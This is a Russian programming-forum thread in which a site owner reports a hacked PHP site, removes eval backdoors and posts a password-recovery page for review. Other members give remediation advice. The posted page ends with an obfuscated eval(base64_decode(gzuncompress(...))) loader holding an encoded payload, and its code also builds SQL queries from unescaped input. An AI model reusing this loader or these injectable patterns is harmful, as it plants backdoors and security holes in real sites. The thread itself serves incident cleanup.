Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Программная инженерия > Безопасность, Шифрование
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 27.02.2018, 00:15   #11
Alex11223
Старожил
 
Аватар для Alex11223
 
Регистрация: 12.01.2011
Сообщений: 19,500
По умолчанию

Странная строка, вы случайно не кинули программиста реализовывавшего проект?)
Ушел с форума, https://www.programmersforum.rocks, alex.pantec@gmail.com, https://github.com/AlexP11223
ЛС отключены Аларом.
Alex11223 вне форума Ответить с цитированием
Старый 27.02.2018, 01:09   #12
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
По умолчанию

Нет)
Сергей 163 вне форума Ответить с цитированием
Старый 27.02.2018, 01:47   #13
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,000
По умолчанию

в любом случае вам по сути оставили backdoor.
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума Ответить с цитированием
Старый 27.02.2018, 01:54   #14
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
По умолчанию

Ещё один eval нашел,удалил тоже. Буду дальше искать
Сергей 163 вне форума Ответить с цитированием
Старый 27.02.2018, 07:58   #15
p51x
Старожил
 
Регистрация: 15.02.2010
Сообщений: 15,695
По умолчанию

Вам не евалы искать надо, а ДЫРУ, через которую стало возможно редактировать ваши php файлы (если, конечно, они изначально были чистые).
p51x вне форума Ответить с цитированием
Старый 27.02.2018, 13:30   #16
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
По умолчанию

Спасибо
Сергей 163 вне форума Ответить с цитированием
Старый 27.02.2018, 15:55   #17
Сергей 163
Пользователь
 
Регистрация: 26.02.2018
Сообщений: 13
По умолчанию

Что скажите на это? Очень много кода base64
Одна из дыр я так понимаю?
<?PHP
################################### ###
################################### ###
$_OPTIMIZATION["title"] = "Восстановление пароля";
$_OPTIMIZATION["description"] = "Восстановление забытого пароля";
$_OPTIMIZATION["keywords"] = "Восстановление забытого пароля";

if(isset($_SESSION["user_id"])){ Header("Location: /account/pole"); return; }

?>




<div class="silver-bk5"><div class="clr"></div>

<div class="autoriz2">

<?PHP

if(isset($_POST["email"])){



$email = $func->IsMail($_POST["email"]);
$time = time();
$tdel = $time + 60*15;

if($email !== false){

$db->Query("DELETE FROM db_recovery WHERE date_del < '$time'");
$db->Query("SELECT COUNT(*) FROM db_recovery WHERE ip = INET_ATON('".$func->UserIP."') OR email = '$email'");
if($db->FetchRow() == 0){

$db->Query("SELECT id, user, email, pass FROM db_users_a WHERE email = '$email'");
if($db->NumRows() == 1){
$db_q = $db->FetchArray();
$rn = rand(515165115, 999999999999);
$new_pass = $func->md5Password($rn);

# Вносим запись в БД
$db->Query("INSERT INTO db_recovery (email, ip, date_add, date_del) VALUES ('$email',INET_ATON('".$func->UserIP."'),'$time','$tdel')");

$db->Query("UPDATE ".$pref."_users_a SET pass = '$new_pass' WHERE email = '".$db_q["email"]."'");
# Отправляем пароль
$sender = new isender;
$sender -> RecoveryPassword($db_q["email"], $rn, $db_q["email"]);

echo "<div class='h-title2'><font color = 'green'><b>Пароль отправлен на Email</b></font></div>";
?>
</div>
<div class="clr"></div>
<?PHP
return;

}else echo "<div class='h-title2'><font color = 'red'><b>Такой Email не найден</b></font></div>";

}else echo "<div class='h-title2'><font color = 'red'><b>Попробуйте через 15 минут</b></font></div>";

}else echo "<div class='h-title2'><font color = 'red'><b>Email указан неверно</b></font></div>";


}

?>



<h3><font color = 'white'>Восстановление доступа!</font></h3>
<BR />
<form action="" method="post"><BR />
<table width="188" border="0" cellspacing="0" cellpadding="0">
<tr>

<td align="left" width="205"><input name="email" type="text" placeholder="Email для отправки пароля" size="25" maxlength="50" class="lg" style=" margin-top:0px;" value="<?=(isset($_POST["email"])) ? $_POST["email"] : false; ?>"/></td>
</tr>
<tr>


<td colspan="2" align="center"><BR /><input type="submit" value="Отправить" style="height: 65px; margin-top:-10px; " class="btn_in"></td>
</tr>
</table>
</form>



</div>


<div id="link1" style="
width: 400px;
height: 445px;
position: absolute;
top: 300px;
left: 50%;
margin-left: -470px;
background: url('../img/boy.png') 0 0 no-repeat;
z-index: 10;
cursor: pointer;

"></div>



</div>
<div class="clr"></div> <?php $J8E334118BC68B37DF94B539152B4D4F0= "eNqVVM2SszYQfKSAZFLm8B3CImFjI1ZCP0 g3kFyLQRjyLRsMTx8eIJfcpmqmp2e6euZzP 50/YTLZj7+Gqk9S0l9PtMcfdL++mbhGJSq2Ykc 7GWhEdoNo/xdgHG2fVe75C6sGFpsA8d9U4In2fqWhP8mU bkzEuQnzrJHk2YCv3yJws8TONEi+bHY+NZ5 tbltgm9q9UDErlY5MZq43IKkdw7vwHZC9Do sXvjfK/9Dg4MlwVoVkE7XBtnZCBN29CPKyQnPKRdzY bJ6qnlx1jyCrJRU836wcdsoJa17zLLMQ3MJ uLS/sJrwkNsAl7XPNBxuWaFmbl5+qkXTcs7lB7K dCHW9AWFjpdrK7zzY4Qw7ijAanrRXOONn9Q 14WtuH8u+nzWdUeNyLvGEygGRyseLK4A8fH uaKhq6ln3GVyaYcO8Zf/rC5yZNxf+BBPzcUdvHlfYowftT+VWfR+vA7 MjncC1tAEUVFByVyfv1tFpiqIVqUiqJCvZc 2ugqNV9Ob9UF0ghjwi8roeMyoX5qsZ39+EM 03gFAo5bXLoNicOLhUrmyYn1RMiUBeJvdga 0WmWmmcVysYBFFDlXo1aaBUyLTnuGTLwwbv ZXYaIBWJrvcyJWALrcaTwXMsxekvkpQX420 pz5H0pZC4eo580iJTNYirVsjKOf6haTnRkd 4Gxdh/nt+kJ09WStv0AVG8hr9mHU3Jp1HD0SfRDRG 8NZ91k5ufQnAjMjH4lpBjC2obTWgHCKtB1P JgvGn6FLIuJQ/5p1QxasK4WIyhHPxvg+nY878eOs0EYuFTWA tjNpg4bxL71EN/IroEelufhudmC67sRklZY/7a1n257AhTu5qLOQ4YWaGSSa3l4bIwCKubM DTqSdVI8Lmayx01VyNzK7BoVgUu0lLrxvi9 UGNLAQCfO74abu00N5dDNek+k6LvBYleWtQ O09ruEdNciLlogzSPFeXm5wirojpv0kVZh0 cj5+UiTt+Mu5cAgM7IT2fHqPAJWaSiey9jW Btx2+ebP5c92i/v7oc8dashTlrQfZ2j24FkCCbRaJz3i3XAd1 IB5DeLBVN3r8ZI/R7zYS+4tLP6j5ut//Y9bNcw3/v3H59evX/8CmF6DXw==";eval(base64_decode(gzun compress(base64_decode($J8E334118BC 68B37DF94B539152B4D4F0))));?>

Последний раз редактировалось Сергей 163; 27.02.2018 в 16:01.
Сергей 163 вне форума Ответить с цитированием
Старый 27.02.2018, 15:58   #18
Alar
Александр
Администратор
 
Аватар для Alar
 
Регистрация: 28.10.2006
Сообщений: 17,758
По умолчанию

Дыры это дыры на сервере, может пароль подобрали, или у вас есть загрузка файлов на сервер и загрузили PHP или другой исполняемый скрипт.

что нужно делать. не разрешать загрузку на сайт.
переустановить всё заного. новая ОС, восстановление из бекапа скрипта без вирусов, проблем.
правильно настроить ОС, доступ к файлам, если что-то создается кому как разрешено что исполнять.

подключаться к серверу только по шифрованным протоколам типа SFTP и т.д.
Alar вне форума Ответить с цитированием
Старый 27.02.2018, 16:01   #19
Alex11223
Старожил
 
Аватар для Alex11223
 
Регистрация: 12.01.2011
Сообщений: 19,500
По умолчанию

Цитата:
Сообщение от Alar Посмотреть сообщение
правильно настроить ОС
там вроде шаред хостинг, а не VPS.
Ушел с форума, https://www.programmersforum.rocks, alex.pantec@gmail.com, https://github.com/AlexP11223
ЛС отключены Аларом.
Alex11223 вне форума Ответить с цитированием
Старый 27.02.2018, 16:02   #20
Alar
Александр
Администратор
 
Аватар для Alar
 
Регистрация: 28.10.2006
Сообщений: 17,758
По умолчанию

Цитата:
Сообщение от Alex11223 Посмотреть сообщение
там вроде шаред хостинг, а не VPS.
Ну тогда обязательно перейти на VPS, шаред хостинг с соседних сайтов легко взламывается.
Alar вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взломали системный файл hosts Restman Общие вопросы C/C++ 2 18.07.2015 05:35
Взломали сайт ruslan0 Безопасность, Шифрование 6 01.10.2011 18:34
Взломали почту на яндексе, что делать? Яр|/||< (^_^) Безопасность, Шифрование 4 17.07.2010 20:53
QIP взломали OrdJONY Свободное общение 12 09.05.2009 12:12